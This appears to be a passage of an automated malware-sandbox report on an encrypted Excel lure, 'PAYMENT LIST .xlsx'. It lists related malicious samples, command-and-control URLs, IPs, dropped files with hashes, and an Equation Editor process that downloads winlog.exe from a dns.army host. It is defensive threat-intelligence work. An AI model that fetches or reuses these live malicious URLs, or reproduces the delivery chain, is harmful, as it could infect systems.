                                                                                                                                                                • www.growingequity.fund/oean/?8pNhXv=yVML0zB0&u4XpH=VZAj6Grbo5w3dBd7w+9BSoe0Fg1VHX3dphJz9/egos9dVzX5qD6mqxE3tIZZ2ImCjS7epxmUBA==
                                                                                                                                                                win32.exeGet hashmaliciousBrowse
                                                                                                                                                                • www.findthatsmartphone.com/incn/?8pBP5p=/AA5bjKPiaWw22bzCdt7lqNbxAyyPpv3elVlM12b4Zuyr5w4xH0F6TIfefQNvJyZz9qG&L6Ah=2dSLFXghYtFd0
                                                                                                                                                                1-26.exeGet hashmaliciousBrowse
                                                                                                                                                                • www.catalogcardgames.net/bf3/?UXrxP8=0T3HW8l&URfXx=Sdh36sWiaQaHmuW5OuhNg2ZSKBobeXsq4DWTIDdmgtvI732RtscB8O3t4ssmBmGg4ghZ
                                                                                                                                                                Request.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • www.cleverwares.com/c8so/?Rf=P253+QYRdhKTDdzjq4pa7Wp7svBpTNddHFol+cUWSKGzAXl94gLhBIvIcI/Xp4fU197lMA==&LDHHp=z4D80PDX
                                                                                                                                                                INV_TMB_210567Y00.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • www.5050alberta.com/xle/?8pqhs=XuVPlIEgAAku+dXH+MR8cy20ZHkP0iJzlT7lKUj3PYBKa8v0bSmzSfHWFfmBCUSgIWFn2Q==&tDH=XRR8
                                                                                                                                                                RFQ.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • www.blacknation.info/c8so/?pBU=HzuD_&gb24XB=6ATEh1s0NdZErsRPIUioXmvz20sSLCkN4f+QHjKAbluYenOJN9FSbPt8XJ2H+dMMf4Jp2Q==
                                                                                                                                                                New Year Inquiry List.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • www.primeoneimplants.com/qjnt/?tB=TtdpPpppFvG&1bwhC=nh3Tl/oLs4HXZ5hiWyD3n36TA5+xQ+CwXb+KxfiJNOta6blp58Sj1H/LHtoCWuUTeWdwKg==
                                                                                                                                                                RF-E93-STD-068 SUPPLIES.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • www.harperandchloe.com/xle/?5jFlkJJh=FNtvxHF14RtgzuhKSaLd0lIzxL3LkdKZj/Q/Opos8UfLtbug0tkzhu0XdD0TouZ6I/qGUQ==&LR-T=vBK0GdQp
                                                                                                                                                                gPGTcEMoM1.exeGet hashmaliciousBrowse
                                                                                                                                                                • www.ctfocbdwholesale.com/bw82/?W6=Rxta6xhtzzdBFDuy4SYKtO8XUaMinJcredo77YczPu8Lep1ecFiaWqXH8h2T5haNROfU&odeTY=cnxhAP6x
                                                                                                                                                                bgJPIZIYby.exeGet hashmaliciousBrowse
                                                                                                                                                                • www.engageautism.info/bw82/?GFND=n1L9MQk6NEQOasYlfxU4KXziLGivOllQbNtATfsC4RjAZctNbAJfQ2EIxV87fcKcU54A&Rlj=YVIX8Hyx
                                                                                                                                                                vA0mtZ7JzJ.exeGet hashmaliciousBrowse
                                                                                                                                                                • www.brainandbodystrengthcoach.com/csv8/?Mjklsrcx=4rzgp1jZc7l8Whg0IztLQnvubqNqMY/2oz5HEUeZ+SGIDqCjyjtIs6qqwwlb5soGHyjF&Hp0xlh=EVvxc8
                                                                                                                                                                E4Q30tDEB9.exeGet hashmaliciousBrowse
                                                                                                                                                                • www.conanbiopharma.com/z9n/?GzuX=Jhwq104eoCBg19EU7i3a/UNFlUD6BU+epYAdz34/Q5fuIRMc24e0hydyrjaAvIdaUf1m&9rspoR=ffn0iZa81
                                                                                                                                                                103.24.200.168NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • www.doxinlabs.com/oean/?MdLxlt=0eja1hG/9tz86IL7VglQafiQyvHA2C4h7eUbaFgtY0eGgr750jLj1uDPdaibWffUDCzVWQ==&gnU4Pf=yZPLGZXHl
                                                                                                                                                                zz4osC4FRa.exeGet hashmaliciousBrowse
                                                                                                                                                                • www.doxinlabs.com/oean/?1ba0AP=0eja1hG69qz46YH3XglQafiQyvHA2C4h7eMLGG8scUeHgaX/zzavjq7Ne/ONSPbnIBul&uHrt=FdiDzjvx

                                                                                                                                                                Domains

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                www.opmania36.compayment list.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 156.253.109.165
                                                                                                                                                                btVnDhh5K7.exeGet hashmaliciousBrowse
                                                                                                                                                                • 156.253.109.165
                                                                                                                                                                www.rentapalla.come0ciSGkcJn.exeGet hashmaliciousBrowse
                                                                                                                                                                • 184.72.229.176
                                                                                                                                                                4wCFJMHdEJ.exeGet hashmaliciousBrowse
                                                                                                                                                                • 184.72.229.176
                                                                                                                                                                www.loimtech.comsLUAeV5Er6.exeGet hashmaliciousBrowse
                                                                                                                                                                • 106.14.46.68
                                                                                                                                                                e0ciSGkcJn.exeGet hashmaliciousBrowse
                                                                                                                                                                • 106.14.46.68
                                                                                                                                                                zz4osC4FRa.exeGet hashmaliciousBrowse
                                                                                                                                                                • 106.14.46.68
                                                                                                                                                                www.doxinlabs.comNEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.24.200.168
                                                                                                                                                                zz4osC4FRa.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.24.200.168

                                                                                                                                                                ASN

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                Africa-on-Cloud-ASZAMkisahOBqH.dllGet hashmaliciousBrowse
                                                                                                                                                                • 45.206.224.237
                                                                                                                                                                AMAZON-AESUSPAYMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.237.41.217
                                                                                                                                                                MV TAN BINH 135.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                • 23.21.76.253
                                                                                                                                                                4NoiNHCNoU.exeGet hashmaliciousBrowse
                                                                                                                                                                • 3.234.181.234
                                                                                                                                                                win32.exeGet hashmaliciousBrowse
                                                                                                                                                                • 52.44.229.95
                                                                                                                                                                order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                • 3.223.115.185
                                                                                                                                                                SecuriteInfo.com.Variant.Zusy.363976.7571.exeGet hashmaliciousBrowse
                                                                                                                                                                • 23.21.126.66
                                                                                                                                                                Shipping Documents.docGet hashmaliciousBrowse
                                                                                                                                                                • 54.235.83.248
                                                                                                                                                                gPGTcEMoM1.exeGet hashmaliciousBrowse
                                                                                                                                                                • 52.23.148.124
                                                                                                                                                                vA0mtZ7JzJ.exeGet hashmaliciousBrowse
                                                                                                                                                                • 3.223.115.185
                                                                                                                                                                8Aobnx1VRi.exeGet hashmaliciousBrowse
                                                                                                                                                                • 23.21.76.253
                                                                                                                                                                RFQ-Strip Casting Line.exeGet hashmaliciousBrowse
                                                                                                                                                                • 54.235.142.93
                                                                                                                                                                INGNhYonmgtGZ9Updf.exeGet hashmaliciousBrowse
                                                                                                                                                                • 3.223.115.185
                                                                                                                                                                NEW ORDER PO 20200909.exeGet hashmaliciousBrowse
                                                                                                                                                                • 23.21.252.4
                                                                                                                                                                bin.shGet hashmaliciousBrowse
                                                                                                                                                                • 18.210.13.68
                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                • 54.225.220.115
                                                                                                                                                                Tebling_Resortsac_FILE-HP38XM.htmGet hashmaliciousBrowse
                                                                                                                                                                • 54.158.2.202
                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                • 54.225.242.59
                                                                                                                                                                SecuriteInfo.com.Variant.MSILPerseus.224695.13350.exeGet hashmaliciousBrowse
                                                                                                                                                                • 23.21.252.4
                                                                                                                                                                1_25_2021 11_20_30 a.m., [Payment 457 CMSupportDev].htmlGet hashmaliciousBrowse
                                                                                                                                                                • 3.218.111.133
                                                                                                                                                                Dropper.xlsmGet hashmaliciousBrowse
                                                                                                                                                                • 3.220.8.221
                                                                                                                                                                GOOGLEUSwno5UOP8TJ.exeGet hashmaliciousBrowse
                                                                                                                                                                • 8.8.8.8
                                                                                                                                                                quote20210126.exe.exeGet hashmaliciousBrowse
                                                                                                                                                                • 34.102.136.180
                                                                                                                                                                org.mozilla.firefox_2015785883.apkGet hashmaliciousBrowse
                                                                                                                                                                • 172.217.20.238
                                                                                                                                                                org.mozilla.firefox_2015785883.apkGet hashmaliciousBrowse
                                                                                                                                                                • 172.217.23.14
                                                                                                                                                                SecuriteInfo.com.Trojan.Packed2.42783.14936.exeGet hashmaliciousBrowse
                                                                                                                                                                • 34.102.136.180
                                                                                                                                                                PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 34.102.136.180
                                                                                                                                                                4NoiNHCNoU.exeGet hashmaliciousBrowse
                                                                                                                                                                • 216.58.207.179
                                                                                                                                                                bXFjrxjRlb.exeGet hashmaliciousBrowse
                                                                                                                                                                • 34.102.136.180
                                                                                                                                                                xl2Ml2iNJe.exeGet hashmaliciousBrowse
                                                                                                                                                                • 34.102.136.180
                                                                                                                                                                eEXZHxdxFE.exeGet hashmaliciousBrowse
                                                                                                                                                                • 35.228.108.144
                                                                                                                                                                v07PSzmSp9.exeGet hashmaliciousBrowse
                                                                                                                                                                • 34.102.136.180
                                                                                                                                                                o3Z5sgjhEM.exeGet hashmaliciousBrowse
                                                                                                                                                                • 35.186.223.98
                                                                                                                                                                ltf94qhZ37.exeGet hashmaliciousBrowse
                                                                                                                                                                • 35.228.108.144
                                                                                                                                                                NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 34.102.136.180
                                                                                                                                                                Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 34.102.136.180
                                                                                                                                                                winlog(1).exeGet hashmaliciousBrowse
                                                                                                                                                                • 34.102.136.180
                                                                                                                                                                win32.exeGet hashmaliciousBrowse
                                                                                                                                                                • 34.102.136.180
                                                                                                                                                                DAT.docGet hashmaliciousBrowse
                                                                                                                                                                • 35.200.206.198
                                                                                                                                                                Bestellung.docGet hashmaliciousBrowse
                                                                                                                                                                • 172.217.6.174
                                                                                                                                                                .01.2021a.jsGet hashmaliciousBrowse
                                                                                                                                                                • 35.228.108.144
                                                                                                                                                                VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNNEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.127
                                                                                                                                                                Clntnjk.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.145.252.55
                                                                                                                                                                Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.125.191.187
                                                                                                                                                                Factura.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.145.252.55
                                                                                                                                                                PO097385.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.172
                                                                                                                                                                BANK FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.128
                                                                                                                                                                BSL 21 PYT.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.123
                                                                                                                                                                COSU6283389840.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.125.191.208
                                                                                                                                                                SQ_07937.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.172
                                                                                                                                                                Payment Ref SW2345.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.122
                                                                                                                                                                inquiry 19117030P.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.132
                                                                                                                                                                Request.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.119
                                                                                                                                                                Payment Advice.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.133
                                                                                                                                                                SQ_073875.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.172
                                                                                                                                                                order0004345.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.128
                                                                                                                                                                TT20200124TSMC.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.121
                                                                                                                                                                Bank Details.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.124
                                                                                                                                                                CI + PL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.125
                                                                                                                                                                RFQ.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.125
                                                                                                                                                                INV_TMB_210567Y00.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.140.251.164

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                No context

                                                                                                                                                                Dropped Files

                                                                                                                                                                No context

                                                                                                                                                                Created / dropped Files

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
                                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):753664
                                                                                                                                                                Entropy (8bit):7.155220486547833
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:WBTK1no2igDy+kRa4HkFrSzjCxc7Ze5w8zyQesOw:jVodEy+qTEF88MGwkN
                                                                                                                                                                MD5:3ED71F97489274760B6CF02192304259
                                                                                                                                                                SHA1:ED19E5DC43352445B1EE3C9D0880661D4A0D3DC4
                                                                                                                                                                SHA-256:FD3450B3F8973200C17FB786110C7A8F7C6994833137CA37322355D1AB9C8E82
                                                                                                                                                                SHA-512:5E617401A943A5B1B475DDFA0F005AD451918D5AC276002AC150BF5E3BF9B2E90B6D731468E96959674B94D1D17988AADAC604B732EF8AE11F03E5F7E10760B3
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Reputation:low
                                                                                                                                                                IE Cache URL:http://kungsb2sndygotchtsnp.dns.army/kung2doc/winlog.exe
                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..t..........J.... ........@.. ....................................@.....................................O.......t............................................................................ ............... ..H............text...Ps... ...t.................. ..`.rsrc...t............v..............@..@.reloc...............~..............@..B................,.......H.......L....p..........0K...G...........................................0............(%...(&.........(.....o'....*.....................((......()......(*......(+......(,....*N..(....o?...(-....*&..(.....*.s/........s0........s1........s2........s3........*....0...........~....o4....+..*.0...........~....o5....+..*.0...........~....o6....+..*.0...........~....o7....+..*.0...........~....o8....+..*&..(9....*...0..<........~.....(:.....,!r...p.....(;...o<...s=............~.....
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43242EC1.jpeg
                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):48770
                                                                                                                                                                Entropy (8bit):7.801842363879827
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\645045CE.jpeg
                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):48770
                                                                                                                                                                Entropy (8bit):7.801842363879827
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82E9F9C0.emf
                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):653280
                                                                                                                                                                Entropy (8bit):2.89864333936019
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:d34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:94UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                                MD5:CACEDA3460EB683B079802D3705F7A1E
                                                                                                                                                                SHA1:44885582D5A2E998AA7E8A857D22DFDB68DFDC4A
                                                                                                                                                                SHA-256:C8E151B02EFA1D9CA96FBF8925266F95AC46F3A2717FBBB0C9FE62E456CB1F98
                                                                                                                                                                SHA-512:0990E44579FC408381B04354CC46E14DA054DD2F13F871E25E801F28D862ADEAD9376AB05357C2684D1BDA1C7678E5149B3D619DEC4CFF26978EE9F5FE998DB3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................!.l.!.......!.P.!..N.T..!...!.....8.!...!..N.T..!...!. ....yQP..!...!. .........E..zQP............................................X...%...7...................{ .@................C.a.l.i.b.r.............\.!.X.....!...!..2JP........8.!.8.!..{HP....`.!...E.dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                                C:\Users\user\Desktop\~$PAYMENT LIST .xlsx
                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):330
                                                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                Malicious:true
                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                C:\Users\Public\vbc.exe
                                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):753664
                                                                                                                                                                Entropy (8bit):7.155220486547833
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:WBTK1no2igDy+kRa4HkFrSzjCxc7Ze5w8zyQesOw:jVodEy+qTEF88MGwkN
                                                                                                                                                                MD5:3ED71F97489274760B6CF02192304259
                                                                                                                                                                SHA1:ED19E5DC43352445B1EE3C9D0880661D4A0D3DC4
                                                                                                                                                                SHA-256:FD3450B3F8973200C17FB786110C7A8F7C6994833137CA37322355D1AB9C8E82
                                                                                                                                                                SHA-512:5E617401A943A5B1B475DDFA0F005AD451918D5AC276002AC150BF5E3BF9B2E90B6D731468E96959674B94D1D17988AADAC604B732EF8AE11F03E5F7E10760B3
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..t..........J.... ........@.. ....................................@.....................................O.......t............................................................................ ............... ..H............text...Ps... ...t.................. ..`.rsrc...t............v..............@..@.reloc...............~..............@..B................,.......H.......L....p..........0K...G...........................................0............(%...(&.........(.....o'....*.....................((......()......(*......(+......(,....*N..(....o?...(-....*&..(.....*.s/........s0........s1........s2........s3........*....0...........~....o4....+..*.0...........~....o5....+..*.0...........~....o6....+..*.0...........~....o7....+..*.0...........~....o8....+..*&..(9....*...0..<........~.....(:.....,!r...p.....(;...o<...s=............~.....

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:CDFV2 Encrypted
                                                                                                                                                                Entropy (8bit):7.996761963486215
                                                                                                                                                                TrID:
                                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                File name:PAYMENT LIST .xlsx
                                                                                                                                                                File size:2593792
                                                                                                                                                                MD5:d707fd5eefcf9c3007a43585b86b021b
                                                                                                                                                                SHA1:6d9f2993d77d9e3dfc00055394581843b3f723b8
                                                                                                                                                                SHA256:ad2ea245de878f559d9da7881785790d151c55e66315f94c6d0b3e2729574f9e
                                                                                                                                                                SHA512:128051546f91bcb91678e94c07af4c2a05baeeeb5a89f5e3739b43c84a732b38c7df2b90a1b5654b00cdae99f6ecd020146bccf9b465a08fb67238516e8b0082
                                                                                                                                                                SSDEEP:49152:1w9tun+NgZQZdgVAy9e1mULkLKc+UmvEOzon5BCSgoltm7LrVg:1w9tu+ng19zAczg+5hBnm7LrVg
                                                                                                                                                                File Content Preview:........................>...................(...................................................................................|.......~...............z.......|.......~...............z.......|.......~...............z.......|.......~......................

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                Static OLE Info

                                                                                                                                                                General

                                                                                                                                                                Document Type:OLE
                                                                                                                                                                Number of OLE Files:1

                                                                                                                                                                OLE File "PAYMENT LIST .xlsx"

                                                                                                                                                                Indicators

                                                                                                                                                                Has Summary Info:False
                                                                                                                                                                Application Name:unknown
                                                                                                                                                                Encrypted Document:True
                                                                                                                                                                Contains Word Document Stream:False
                                                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                                Flash Objects Count:
                                                                                                                                                                Contains VBA Macros:False

                                                                                                                                                                Streams

                                                                                                                                                                Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                General
                                                                                                                                                                Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                                File Type:data
                                                                                                                                                                Stream Size:64
                                                                                                                                                                Entropy:2.73637206947
                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                                Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                                Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                                General
                                                                                                                                                                Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                                File Type:data
                                                                                                                                                                Stream Size:112
                                                                                                                                                                Entropy:2.7597816111
                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                                Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                                Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                                General
                                                                                                                                                                Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                                File Type:data
                                                                                                                                                                Stream Size:200
                                                                                                                                                                Entropy:3.13335930328
                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                                Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                                General
                                                                                                                                                                Stream Path:\x6DataSpaces/Version
                                                                                                                                                                File Type:data
                                                                                                                                                                Stream Size:76
                                                                                                                                                                Entropy:2.79079600998
                                                                                                                                                                Base64 Encoded:False
